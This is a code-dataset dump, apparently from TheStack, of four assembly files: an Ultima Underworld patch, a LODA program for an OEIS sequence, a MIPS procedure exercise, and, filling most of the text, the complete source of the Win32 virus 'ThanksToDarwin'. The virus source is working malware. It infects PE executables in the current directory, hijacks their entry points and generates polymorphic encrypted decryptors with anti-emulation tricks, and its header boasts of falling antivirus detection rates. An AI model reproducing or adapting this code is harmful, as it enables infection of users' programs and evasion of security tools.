source
stringclasses 1
value | id
stringlengths 40
40
| language
stringclasses 2
values | date
stringclasses 1
value | author
stringclasses 1
value | url
stringclasses 1
value | title
stringclasses 1
value | extra
stringlengths 528
1.53k
| quality_signals
stringlengths 139
178
| text
stringlengths 6
1.05M
|
---|---|---|---|---|---|---|---|---|---|
TheStack | 779ce20f5e7e9446aeecbf699dff7cd7f9b1cafd | Assemblycode:Assembly | {"size": 652, "ext": "asm", "max_stars_repo_path": "uw1/call-eop-enqueueDrawBlock.asm", "max_stars_repo_name": "JohnGlassmyer/UltimaHacks", "max_stars_repo_stars_event_min_datetime": "2018-03-04T22:34:22.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-10T15:18:32.000Z", "max_issues_repo_path": "uw1/call-eop-enqueueDrawBlock.asm", "max_issues_repo_name": "ptrie/UltimaHacks", "max_issues_repo_issues_event_min_datetime": "2018-11-20T04:06:49.000Z", "max_issues_repo_issues_event_max_datetime": "2021-11-08T16:37:10.000Z", "max_forks_repo_path": "uw1/call-eop-enqueueDrawBlock.asm", "max_forks_repo_name": "ptrie/UltimaHacks", "max_forks_repo_forks_event_min_datetime": "2020-09-01T17:57:36.000Z", "max_forks_repo_forks_event_max_datetime": "2022-01-04T20:51:11.000Z"} | {"max_stars_count": 68, "max_issues_count": 19, "max_forks_count": 4, "avg_line_length": 24.1481481481, "max_line_length": 72, "alphanum_fraction": 0.773006135} | %include "../UltimaPatcher.asm"
%include "include/uw1.asm"
%include "include/uw1-eop.asm"
[bits 16]
startPatch EXE_LENGTH, \
call eop enqueueDrawBlock to skip drawing if draw-queue is nearly full
%macro callEopEnqueueDrawBlockAt 2
startBlockAt %1, %2
; si : grid index for current row and column
push si
push varArgsEopArg(enqueueDrawBlock, 1)
callFromLoadModule varArgsEopDispatcher
add sp, 4
nop
endBlockOfLength 13
%endmacro
; 3 calls to enqueueDrawBlock in enqueueDrawBlocksWithinLimits
callEopEnqueueDrawBlockAt 19, 0x0652
callEopEnqueueDrawBlockAt 19, 0x06C7
callEopEnqueueDrawBlockAt 19, 0x06FE
endPatch
|
||||
TheStack | 344993e7beb50d6bcc776ad3e68bb2279fe18f49 | Assemblycode:Assembly | {"size": 22089, "ext": "asm", "max_stars_repo_path": "Win32/Win32.ThanksToDarwin/Win32.ThanksToDarwin.asm", "max_stars_repo_name": "fengjixuchui/Family", "max_stars_repo_stars_event_min_datetime": "2021-05-15T15:57:13.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-16T09:11:05.000Z", "max_issues_repo_path": "Win32/Win32.ThanksToDarwin/Win32.ThanksToDarwin.asm", "max_issues_repo_name": "fengjixuchui/Family", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "Win32/Win32.ThanksToDarwin/Win32.ThanksToDarwin.asm", "max_forks_repo_name": "fengjixuchui/Family", "max_forks_repo_forks_event_min_datetime": "2021-05-15T15:57:15.000Z", "max_forks_repo_forks_event_max_datetime": "2022-01-08T20:51:04.000Z"} | {"max_stars_count": 3, "max_issues_count": null, "max_forks_count": 3, "avg_line_length": 21.9354518371, "max_line_length": 92, "alphanum_fraction": 0.6379645978} | ; W32.ThanksToDarwin by BlueOwl
; ---------------------------------------------------------------------
;
; W32.ThanksToDarwin is my first genetic polymorphic virus. Unlike normal poly-
; morphic virusses which generate their decryptors at random, this virus
; will use its genes to do so and only a few adaptations are made each
; time to genes. This way, its offspring will look like it and thus
; inherit the genes that made it survive. All thanks to Darwinian -
; evolution :).
;
; Disclaimer: I do mention how fun it is to assemble and try this out
; a few times in this article. I am not responsible for any
; loss though. I did my best.
;
; Results with (not yet updated) antivirus scanners in my tests:
; 1st generation detection: 100%
; 2nd generation detection: 70%
; 3rd generation detection: 5%
; 4rd generation detection: 4%
; (no difference after this)
;
; Because of the gene-giving even if only a small fraction survived their
; offspring would infect good because they 'know what worked'.
;
; Details: - Kan produce 268435456 different decryptors and 65536 different
; encryptions. In all, 17592186044416, different virusses. Leave
; it up to evolution to find that perfect one!
; - Infection mark = milliseconds and seconds of the creation date
; set to zero
; - Does not restore the original files dates on purpose: file -
; checkers that see the file has been changed will sooner alert
; when the program date did not change, as this is typical virus
; behaviour
; - Will only infect the current directory so if you like you can
; try the virus without having to fear getting your whole computer
; infected
; - On some points, the virus could do a lot better, I just didn't
; feel like making it that good. I hope you are inspired to make
; a genetic virus which is lots better though.
;
; Note: if you choose to assemble it please note that the 1st generation
; will crash when it tries to return to the original host (because
; there is none ;)).
;
; Thanks to: Docter Ludwig for his book "The big black book of
; computer virusses", with some data about genetic
; virusses in the DOS days.
;
; Assemble with FASM (http://www.flatassembler.net)
;
;
; 17-3-2004 Note: After this version I made lots of other (unpublished,
; yet?) virusses but I decided to publish this anyways as people
; might learn something from it anyways. The api finding and
; everything is very old school, but just remember it was
; one of my first stupid pe-virusses. I also gave this virus
; a better RNG.
;
; ---------------------------------------------------------------------
; I'm sorry for not commenting it much
include '%fasminc%/win32ax.inc'
; Simple equates
gzero equ db 0ACh,08h,0C0h,75h,0FBh
virus_size equ (end_of_virus-start_of_virus)
genes_count equ (mgenes_end-mutate)
; Apis
FindFirstFile equ [ebp+(_FindFirstFile-delta)]
FindNextFile equ [ebp+(_FindNextFile-delta)]
FindClose equ [ebp+(_FindClose-delta)]
CreateFile equ [ebp+(_CreateFileA-delta)]
ReadFile equ [ebp+(_ReadFile-delta)]
WriteFile equ [ebp+(_WriteFile-delta)]
CloseHandle equ [ebp+(_CloseHandle-delta)]
GlobalAlloc equ [ebp+(_GlobalAlloc-delta)]
GlobalLock equ [ebp+(_GlobalLock-delta)]
GlobalUnlock equ [ebp+(_GlobalUnlock-delta)]
GlobalFree equ [ebp+(_GlobalFree-delta)]
SetFileAttributes equ [ebp+(_SetFileAttributes-delta)]
FileTimeToLocalFileTime equ [ebp+(_FileTimeToLocalFileTime-delta)]
FileTimeToSystemTime equ [ebp+(_FileTimeToSystemTime-delta)]
SystemTimeToFileTime equ [ebp+(_SystemTimeToFileTime-delta)]
LocalFileTimeToFileTime equ [ebp+(_LocalFileTimeToFileTime-delta)]
SetFileTime equ [ebp+(_SetFileTime-delta)]
GetProcAddress equ [ebp+(getprocaddr-delta)]
start_of_virus:
virus_start: mov edx, 12345678h ; this will be filled with the-
call delta ; decryptor size
delta: pop ebp
mov eax, ebp
sub eax, edx
sub eax, (delta-virus_start)
sub eax, 12345678h
NEIP: NewEIP equ (NEIP-4)
add eax, 12345678h
OEIP: OldEIP equ (OEIP-4)
mov [ebp+(return_addr-delta)], eax
mov esi, [esp]
sub si, si
mov ecx, 20h
loop_mz: cmp word [esi], 'MZ'
je got_k32
sub esi, 1000h
loopne loop_mz
jmp goto_host
got_k32: mov edx,esi
mov [ebp+(k32-delta)], edx
mov ebx, [esi+03Ch]
add ebx, esi
cmp word [ebx], 'PE'
je kernel_ok
jmp goto_host
kernel_ok: mov ebx, [ebx+078h]
add ebx, esi
mov eax, [ebx+020h]
add esi, eax
xor ecx, ecx
searchexport: lodsd
add eax, edx
push esi
mov esi, eax
lodsd
cmp eax, 'GetP'
jne cagain
lodsd
cmp eax, 'rocA'
jne cagain
pop esi
jmp got_procaddr
cagain: pop esi
inc ecx
cmp ecx,[ebx+018h]
jle searchexport
jmp goto_host
got_procaddr: mov esi,[ebx+01Ch]
add esi,edx
inc ecx
addj: lodsd
add eax,edx
loop addj
done: mov [ebp+(getprocaddr-delta)],eax
lea esi, [ebp+(k32_apis-delta)]
get_apis: push esi
push [ebp+(k32-delta)]
call GetProcAddress
mov ebx, eax
gzero
mov edi, esi
mov eax, ebx
stosd
mov esi, edi
mov al, [esi]
or al, al
jnz get_apis
pushad
lea edi, [ebp+(cpy-delta)]
lea esi, [ebp+(mutate-delta)]
mov ecx, (mutateend-mutate)
rep movsb
popad
push 314d
push GMEM_MOVEABLE
call GlobalAlloc
or eax, eax
jz goto_host
mov [ebp+(findmem_handle-delta)], eax
push eax
call GlobalLock
mov [ebp+(findmem-delta)], eax
push eax
lea eax, [ebp+(search_mask-delta)]
push eax
call FindFirstFile
mov [ebp+(find_handle-delta)], eax
inc eax
jz search_end
infect_file: mov eax, [ebp+(findmem-delta)]
lea eax, [eax+4]
lea ebx, [ebp+(filetime-delta)]
push ebx
push eax
call FileTimeToLocalFileTime
lea eax, [ebp+(systemtime-delta)]
push eax
lea ebx, [ebp+(filetime-delta)]
push ebx
call FileTimeToSystemTime
mov ax, [ebp+(smsecond-delta)]
cmp ax, 0
jne host_ok
mov ax, [ebp+(ssecond-delta)]
cmp ax, 0
je already_infected
host_ok: mov [ebp+(smsecond-delta)], 0
mov [ebp+(ssecond-delta)], 0
call infection
already_infected:
push [ebp+(findmem-delta)]
push [ebp+(find_handle-delta)]
call FindNextFile
or eax, eax
jnz infect_file
push [ebp+(find_handle-delta)]
call FindClose
search_end: push [ebp+(findmem_handle-delta)]
call GlobalUnlock
push [ebp+(findmem_handle-delta)]
call GlobalFree
or ebp, ebp
jz skip_jump
goto_host: push [ebp+(return_addr-delta)]
skip_jump: ret
; -----------------------------------------------------------------------------------
infection: push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
mov ebx, [ebp+(findmem-delta)]
add ebx, 44
push ebx
call CreateFile
mov [ebp+(file_handle-delta)], eax
mov edx, eax
inc eax
jz return_infect ; can't open
mov eax, [ebp+(findmem-delta)]
mov eax, [eax+32]
add eax, (virus_size+600) ; make some room (+600 to be sure)
push eax
push GMEM_MOVEABLE
call GlobalAlloc
or eax, eax
jz close_file ; can't allocate
mov [ebp+(filemem_handle-delta)], eax
push eax
call GlobalLock
mov [ebp+(filemem-delta)], eax
push 0
lea ebx, [ebp+(NBR-delta)]
push ebx
mov eax, [ebp+(findmem-delta)]
push dword [eax+32]
push [ebp+(filemem-delta)]
push [ebp+(file_handle-delta)]
call ReadFile
or eax, eax
jz close_mem
push [ebp+(file_handle-delta)]
call CloseHandle
mov eax, [ebp+(filemem-delta)]
mov esi, [eax+3Ch]
add esi, eax ; get pointer to pe header
cmp dword [esi], "PE"
jne close_mem
mov eax, [esi+3Ch]
mov [ebp+(file_align-delta)], eax
mov edi, esi
movzx eax, word [edi+06h]
dec eax
imul eax,eax,28h ; * 28
add esi,eax ;
add esi,78h ; dir table
mov edx,[edi+74h] ; dir entries
shl edx,3 ; * 8
add esi,edx ; last section
mov eax,[edi+28h] ; get entrypoint
mov dword [ebp+(OldEIP-delta)],eax ; save
mov edx,[esi+10h] ; edx = size of raw data
mov ebx,edx ;
add edx,[esi+14h] ; add pointer to raw data
push edx
mov eax,ebx
add eax,[esi+0Ch] ; eax = new eip
mov [edi+28h],eax ; change it
mov dword [ebp+(NewEIP-delta)],eax
mov [ebp+(sheader-delta)], esi
mov [ebp+(dheader-delta)], edi
pop edx
or dword [esi+24h],0A0000020h ; put writeable, readable, executable
xchg edi,edx
add edi,dword [ebp+(filemem-delta)] ; save the stuff for later
mov [ebp+(start_host-delta)], edi
pushad
lea esi, [ebp+(cpy-delta)]
lea edi, [ebp+(mutate-delta)]
mov ecx, (mutateend-mutate)
rep movsb ; save the genes
dw 310Fh
xor [ebp+(random_seed-delta)], eax ; randomize
xor [ebp+(startkey-delta)], al ; ..
xor [ebp+(slidingkey-delta)], ah ; ..
lea esi, [ebp+(mutate-delta)]
mov edi, esi
mov ecx, genes_count
decide_loop: sub eax, eax ; randomize the genes
mov al, genes_count
call rand_index
or eax, eax
jnz noswitch
lodsb
xor al, 1 ; switch gene off/on
stosb
jmp switched
noswitch: movsb
switched: dec ecx
jne decide_loop
mov ecx, 6
lea esi, [ebp+(regs-delta)]
decide2_loop: mov eax, 5
call rand_index
mov ebx, eax
mov al, [esi]
xchg al, [esi+ebx]
mov [esi], al
dec ecx
jne decide2_loop
popad
; ---------------------------------------------------------------------------
original_esp equ [edx-(1*4)]
so_virus equ [edx-(2*4)]
so_void equ [edx-(3*4)]
vsize equ [edx-(4*4)]
pos_callplace equ [edx-(5*4)]
ads_distance equ [edx-(6*4)]
ads_size equ [edx-(7*4)]
start_loop equ [edx-(8*4)]
poly_generator: mov edx, esp ; stack to edx
push esp
push esi
push edi
push ecx
; Gene for cutting of emulation
; -----------------------------
cmp [ebp+(gene_noemul-delta)], 0
je no_emul
mov ax, 0C029h
stosw
mov ax, 0C8FEh ; sub eax, eax
stosw ; keep_going: dec al
mov ax, 0C008h ; or al, al
stosw ; je was_oke
mov ax, 0474h ; jne keep_going
stosw ; jmp somewhere_in_code
mov ax, 0F875h ; was_oke:
stosw
mov ax, 67EBh
stosw
no_emul:
; Extra anti emulation
; --------------------
cmp [ebp+(gene_specialkey-delta)], 0
jne skipskey
cmp [ebp+(startkey-delta)], 0
je skipskey ; here an av would get
mov ax, 1829h ; forced to loop X times
or ah, [ebp+(gene_encrypt-delta)] ; in order to get the
shl ah, 3 ; encryption key
or ah, [ebp+(gene_encrypt-delta)] ; if it doesn't (and most-
stosw ; don't) the virus body
mov ax, 0C929h ; will be wrongly de-
stosw ; crypted
mov al, 0B1h
stosb
mov al, [ebp+(startkey-delta)]
stosb
mov al, 40h
or al, [ebp+(gene_encrypt-delta)]
stosb
mov ax, 0FDE2h
cmp [ebp+(gene_specialkeyl-delta)],0
jne no_decskl
mov al, 049h
stosb
mov ax, 0FC75h
no_decskl: stosw
skipskey:
; Gene for the Call
; -----------------
cmp [ebp+(gene_call-delta)], 0
jne callway2
mov al, 0E8h ; call nextbyte
stosb
push edi
sub eax, eax ; " "
stosd
mov al, 58h
or al, [ebp+(gene_memreg-delta)]
stosb
jmp callend
callway2: mov al, 0E8h ; call to_end_of_code
stosb
push edi
stosd
callend:
; Gene for adding distance
; ------------------------
mov al, 81h ; this is always in front of
; add and sub
cmp [ebp+(gene_distance-delta)],0
jne distance2
mov ah, 0C0h ; add
jmp distancedone
distance2: mov ah, 0E8h ; sub
distancedone: or ah, [ebp+(gene_memreg-delta)]
stosw
push edi
stosd
; Gene for declaring virus-size
; -----------------------------
cmp [ebp+(gene_size-delta)],0
jne size2
mov al, 0B8h ; mov reg, x
or al, [ebp+(gene_counter-delta)]
stosb
jmp size_done
size2: cmp [ebp+(gene_sizem-delta)], 0
jne sizem2
mov ax, 01831h ; xor reg, reg
or ah, [ebp+(gene_counter-delta)]
shl ah, 3
or ah, [ebp+(gene_counter-delta)]
stosw
jmp sizeput
sizem2: mov ax, 01829h
or ah, [ebp+(gene_counter-delta)]
shl ah, 3
or ah, [ebp+(gene_counter-delta)]
stosw
sizeput: cmp [ebp+(gene_sizea-delta)], 0
je puts2
mov ax, 0F081h
jmp putsand
puts2: mov ax, 0C881h
putsand: or ah, [ebp+(gene_counter-delta)]
stosw
size_done: push edi
mov eax, virus_size
stosd
; Gene for declaring the first
; encryption value
; ----------------------------
cmp [ebp+(gene_specialkey-delta)], 0
je key_done
key_normal: cmp [ebp+(gene_1stval-delta)],0
jne firstval2
mov al, 0B8h
or al, [ebp+(gene_encrypt-delta)]
stosb
jmp firstvalend
firstval2: cmp [ebp+(gene_1stvalb-delta)], 0
jne firstvalb2
mov ax, 0E083h
or ah, [ebp+(gene_encrypt-delta)]
stosw
sub eax, eax
stosb
jmp firstvalb_end
firstvalb2: mov ax, 01829h
or ah, [ebp+(gene_encrypt-delta)]
shl ah, 3
or ah, [ebp+(gene_encrypt-delta)]
stosw
firstvalb_end: cmp [ebp+(gene_addenc-delta)], 0
jne fza2
mov ax, 0C081h
or ah, [ebp+(gene_encrypt-delta)]
stosw
jmp firstvalend
fza2: mov ax, 0C881h
or ah, [ebp+(gene_encrypt-delta)]
stosw
firstvalend: push edi
sub eax, eax
mov al, [ebp+(startkey-delta)]
stosd
key_done:
push edi
; Get byte gene
; -------------
cmp [ebp+(gene_getbyte-delta)], 0
jne getbyte2
mov al, 08Ah ; xchg or mov
jmp getbytedone
getbyte2: mov al, 086h
getbytedone: mov ah, [ebp+(gene_memreg-delta)]
stosw
; Encrypt byte gene
; -----------------
cmp [ebp+(gene_encryptb-delta)], 0
jne eb2
mov ax, 2966h ; sub
jmp insbe
eb2: mov ax, 3166h ; xor
insbe: stosw
mov al, 18h
or al, [ebp+(gene_encrypt-delta)]
shl al, 3
stosb
; Store byte gene
; ---------------
mov al, 88h
cmp [ebp+(gene_store-delta)], 0 ; xchg or mov again
jne store2
mov al, 86h
store2: mov ah, [ebp+(gene_memreg-delta)]
stosw
; Increment memreg gene
; ---------------------
cmp [ebp+(gene_increment-delta)], 0
jne inc2
mov al, 040h ; inc
or al, [ebp+(gene_memreg-delta)]
stosb
jmp incdone
inc2: mov ax, 0C083h ; add
or ah, [ebp+(gene_memreg-delta)]
stosw
mov al, 1
stosb
incdone:
; Change the encryption key gene
; ------------------------------
cmp [ebp+(gene_slidingkey-delta)], 0
jne no_slidingkey
cmp [ebp+(gene_slidingkeym-delta)], 0
jne slidingkey2
mov al, 80h
stosb
mov al, 0C0h
or al, [ebp+(gene_encrypt-delta)]
mov ah, [ebp+(slidingkey-delta)]
stosw
jmp slidingkey_done
slidingkey2: mov al, 40h
or al, [ebp+(gene_encrypt-delta)]
stosb
slidingkey_done:
no_slidingkey:
; Decrement the encryptcount gene
; -------------------------------
cmp [ebp+(gene_ecount-delta)], 0
jne ecount2
mov ax, 0E883h
or ah, [ebp+(gene_counter-delta)]
stosw
mov al, 1
jmp ecount_done
ecount2: mov al, 48h
or al, [ebp+(gene_counter-delta)]
ecount_done: stosb
; Loop gene
; ---------
cmp [ebp+(gene_loop-delta)], 0
jne loop2
mov ax, 0F883h
or ah, [ebp+(gene_counter-delta)]
stosw
sub eax, eax
stosb
mov ebx, edi
sub ebx, start_loop
neg bl
dec bl
dec bl
mov al, 75h
cmp [ebp+(gene_loop2-delta)], 0
jne loop1b
mov al, 77h
loop1b: mov ah, bl
stosw
jmp loopdone
loop2: mov ax, 1809h
or ah, [ebp+(gene_counter-delta)]
shl ah, 3
or ah, [ebp+(gene_counter-delta)]
stosw
mov ebx, edi
sub ebx, start_loop
neg bl
dec bl
dec bl
mov al, 75h
mov ah, bl
stosw
loopdone:
; Catch call gene
; ---------------
cmp [ebp+(gene_call-delta)], 0
je skip_catchcall
mov al, 0EBh
stosb ; ...
mov esi, edi
stosb
mov eax, edi
mov ebx, pos_callplace
sub eax, ebx
sub eax, 4
mov [ebx], eax
mov al, 58h
or al, [ebp+(gene_memreg-delta)]
stosb
cmp [ebp+(gene_callret-delta)], 0
je callret2
mov al, 50h
or al, [ebp+(gene_memreg-delta)]
mov ah, 0C3h
stosw
jmp endcallret
callret2: mov ax, 0E0FFh
or ah, [ebp+(gene_memreg-delta)]
stosw
endcallret: mov eax, edi
sub eax, esi
dec eax
mov [esi], al
skip_catchcall:
; ....................................................................................
ender: mov ecx, ads_distance
mov eax, edi
sub eax, pos_callplace
sub eax, 4
cmp [ebp+(gene_distance-delta)], 0
je skip_neg
neg eax
skip_neg: mov [ecx], eax
push edi
lea esi,[ebp+(virus_start-delta)] ; copy virus (with changed DNA)
mov ecx,virus_size ; to host
rep movsb ;
pop esi
mov eax, esi
sub eax, [ebp+(start_host-delta)]
mov [esi+1], eax
sub ebx, ebx
cmp [ebp+(gene_slidingkey-delta)], 0
jne skip_sliding
cmp [ebp+(gene_slidingkeym-delta)], 0
jne s_onlyinc
mov bl, [ebp+(slidingkey-delta)]
dec bl
s_onlyinc: inc bl
skip_sliding:
mov bh, [ebp+(startkey-delta)]
push edi
mov edi, esi
mov ecx, virus_size
cmp [ebp+(gene_encryptb-delta)], 0
jne loop_encryptx
loop_encrypta: lodsb
add al, bh
stosb
add bh, bl
loop loop_encrypta
jmp endx
loop_encryptx: lodsb
xor al, bh
stosb
add bh, bl
loop loop_encryptx
endx:
pop edi
mov esp, original_esp
; ---------------------------------------------------------------------------
sub edi, [ebp+(start_host-delta)]
mov [ebp+(start_host-delta)], edi
push FILE_ATTRIBUTE_NORMAL
mov eax, [ebp+(findmem-delta)]
lea eax, [eax+44]
push eax
call SetFileAttributes
push 0
push FILE_ATTRIBUTE_NORMAL
push CREATE_ALWAYS
push 0
push 0
push GENERIC_WRITE
mov eax, [ebp+(findmem-delta)]
lea eax, [eax+44]
push eax
call CreateFile
mov [ebp+(file_handle-delta)], eax
inc eax
jz close_mem
push 0
lea eax, [ebp+(NBR-delta)]
push eax
mov eax, [ebp+(findmem-delta)]
mov eax, [eax+32]
add eax, [ebp+(start_host-delta)]
mov ecx, [ebp+(file_align-delta)]
call align_it
push eax
mov esi,[ebp+(sheader-delta)]
mov edi,[ebp+(dheader-delta)]
mov eax,[esi+10h] ; SizeOfRawData
add eax,[ebp+(start_host-delta)] ; +virus_size+decryptor_size
mov ecx,[edi+3Ch]
call align_it
mov [esi+10h], eax ; save the new sizes
mov [esi+08h], eax
;mov eax,[esi+10h] ; EAX = New SizeOfRawData
add eax,[esi+0Ch]
mov [edi+50h],eax ; save to size of image
push [ebp+(filemem-delta)]
push [ebp+(file_handle-delta)]
call WriteFile
lea eax, [ebp+(filetime-delta)] ; normal time to local filetime
push eax
lea eax, [ebp+(systemtime-delta)]
push eax
call SystemTimeToFileTime
lea eax, [ebp+(filetime2-delta)] ; local filetime to filetime
push eax
lea eax, [ebp+(filetime-delta)]
push eax
call LocalFileTimeToFileTime
push 0 ; mark the file as infected
push 0
lea eax, [ebp+(filetime2-delta)]
push eax
push [ebp+(file_handle-delta)]
call SetFileTime
close_mem: push [ebp+(filemem_handle-delta)]
call GlobalUnlock
push [ebp+(filemem_handle-delta)]
call GlobalFree
close_file: push [ebp+(file_handle-delta)] ; set original attributes
call CloseHandle
mov eax, [ebp+(findmem-delta)]
push dword [eax]
lea eax, [eax+44]
push eax
call SetFileAttributes
return_infect: ret
; simple align a value
; --------------------
align_it: push edx
sub edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx
ret
; random number between 0 and eax
; (this is a good one!)
; -------------------------------
rand_index: push edx
push ecx
push ebx
mov ecx, eax
inc ecx
mov eax, [ebp+(random_seed-delta)]
rol eax, 5 ; by me ;)
neg ax
mov bx, ax
sub al, ah
bswap eax
xor ah, al
sub ax, bx
mov [ebp+(random_seed-delta)], eax
sub edx, edx
div ecx
mov eax, edx
pop ebx
pop ecx
pop edx
ret
; -----------------------------------------------------------------------------------
; DATA
file_handle dd 0
filemem_handle dd 0 ; handles
filemem dd 0
file_align dd 0
return_addr dd 0
start_host dd 0
search_mask db "test*.exe",0
find_handle dd 0
findmem_handle dd 0
findmem dd 0
startkey db 11h
slidingkey db 9Ch
; The virus DNA
; Feel free to make changes and see
; the decryptor change :)
; ---------------------------------
mutate:
gene_call db 0 ; should have been just bits, but whatever ;)
gene_distance db 0
gene_size db 0
gene_sizem db 0
gene_sizea db 0
gene_1stval db 0
gene_1stvalb db 0
gene_addenc db 0
gene_getbyte db 0
gene_encryptb db 0
gene_store db 0
gene_increment db 0
gene_ecount db 0
gene_loop db 0
gene_loop2 db 0
gene_noemul db 0
gene_callret db 0
gene_slidingkey db 0
gene_slidingkeym db 0
gene_specialkey db 0
gene_specialkeyl db 0
mgenes_end:
regs:
gene_memreg db 6h ; I think i forgot to make code for changing
gene_counter db 1h ; these :D. Whatever ;)
gene_encrypt db 3h
gene_encryptc db 2h
gene_junk1 db 5h
gene_junk2 db 7h
mutateend:
cpy rb (mutateend-mutate)
filetime dd 0,0
filetime2 dd 0,0
systemtime dw 0,0,0,0,0,0
ssecond dw 0
smsecond dw 0
random_seed dd 93FA017Bh
NBR dd 0
k32 dd 0
getprocaddr dd 0
sheader dd 0
dheader dd 0
gptext db 'GetProcAddress',0
; Api table
k32_apis db "FindFirstFileA",0
_FindFirstFile dd 0
db "FindNextFileA",0
_FindNextFile dd 0
db "FindClose",0
_FindClose dd 0
db "CreateFileA",0
_CreateFileA dd 0
db "ReadFile",0
_ReadFile dd 0
db "WriteFile",0
_WriteFile dd 0
db "CloseHandle",0
_CloseHandle dd 0
db "GlobalAlloc",0
_GlobalAlloc dd 0
db "GlobalLock",0
_GlobalLock dd 0
db "GlobalUnlock",0
_GlobalUnlock dd 0
db "GlobalFree",0
_GlobalFree dd 0
db "SetFileAttributesA",0
_SetFileAttributes dd 0
db "FileTimeToLocalFileTime",0 ; apis used for
_FileTimeToLocalFileTime dd 0 ; filemarking
db "FileTimeToSystemTime",0
_FileTimeToSystemTime dd 0
db "SystemTimeToFileTime",0
_SystemTimeToFileTime dd 0
db "LocalFileTimeToFileTime",0
_LocalFileTimeToFileTime dd 0
db "SetFileTime",0
_SetFileTime dd 0
db 0
end_of_virus:
; &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
|
||||
TheStack | d1f1f41b4851722e23a74e8dfb54ef4a6236259a | Assemblycode:Assembly | {"size": 657, "ext": "asm", "max_stars_repo_path": "oeis/179/A179558.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/179/A179558.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/179/A179558.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 50.5384615385, "max_line_length": 497, "alphanum_fraction": 0.8417047184} | ; A179558: a(1)=10; a(n) = a(n-1)*10 - 5^(n-2).
; Submitted by Jamie Morken(s1)
; 10,99,985,9825,98125,980625,9803125,98015625,980078125,9800390625,98001953125,980009765625,9800048828125,98000244140625,980001220703125,9800006103515625,98000030517578125,980000152587890625,9800000762939453125,98000003814697265625,980000019073486328125,9800000095367431640625,98000000476837158203125,980000002384185791015625,9800000011920928955078125,98000000059604644775390625,980000000298023223876953125,9800000001490116119384765625,98000000007450580596923828125,980000000037252902984619140625
mov $1,5
pow $1,$0
mov $2,10
pow $2,$0
mul $2,49
add $1,$2
mov $0,$1
div $0,5
|
||||
TheStack | 9c06d9e0df8976cbdcd60ca5436d74ce81a67980 | Assemblycode:Assembly | {"size": 1202, "ext": "asm", "max_stars_repo_path": "Miei-sorgenti/new/Simulazione/BranchY/branchy.asm", "max_stars_repo_name": "DigiOhhh/LabArchitettura2-2017-2018", "max_stars_repo_stars_event_min_datetime": "2019-03-06T13:26:10.000Z", "max_stars_repo_stars_event_max_datetime": "2019-03-06T13:26:10.000Z", "max_issues_repo_path": "Miei-sorgenti/new/Simulazione/BranchY/branchy.asm", "max_issues_repo_name": "DigiOhhh/LabArchitettura2-2017-2018", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "Miei-sorgenti/new/Simulazione/BranchY/branchy.asm", "max_forks_repo_name": "DigiOhhh/LabArchitettura2-2017-2018", "max_forks_repo_forks_event_min_datetime": "2019-03-06T13:25:28.000Z", "max_forks_repo_forks_event_max_datetime": "2019-03-06T13:25:28.000Z"} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": 1, "avg_line_length": 22.679245283, "max_line_length": 107, "alphanum_fraction": 0.6314475874} | # (A) Si implementi, senza fare uso di pseudo-istruzioni, una procedura chiamata ``branchy'' così definita:
# Input: due valori interi a e b, due indirizzi del segmento testo T1 e T2.
# Output: un indirizzo del segmento testo.
# La procedura restituisce un indirizzo determinato da queste condizioni:
# se a>b viene restituito T1;
# se a<b viene restituito T2;
# (B) se a=b viene restituito l'indirizzo dell'istruzione che, nel chiamante, precede la chiamata
# alla procedura.
.text
.globl branchy
branchy:
subu $sp, $sp, 24
sw $s0, 20($sp)
sw $s1, 16($sp)
sw $s2, 12($sp)
sw $s3, 8($sp)
sw $fp, 4($sp)
sw $ra, ($sp)
addiu $fp, $sp, 20
add $s0, $a0, $zero
add $s1, $a1, $zero
add $s2, $a2, $zero
add $s3, $a3, $zero
slt $t0, $s0, $s1
addi $t1, $zero, 1
beq $t0, $t1, a_less_b
beq $s0, $s1, a_equal_b
# a_greater_b
add $v0, $s2, $zero
j return
a_less_b: add $v0, $s3, $zero
j return
a_equal_b: add $v0, $ra, $zero
addi $v0, $v0, -8 # In $ra viene inserito l'indirizzo della chiamata più 4, quindi
# devo sottrarre 8
return: lw $ra, ($sp)
lw $fp, 4($sp)
lw $s3, 8($sp)
lw $s2, 12($sp)
lw $s1, 16($sp)
lw $s0, 20($sp)
addi $sp, $sp, 24
jr $ra |
||||
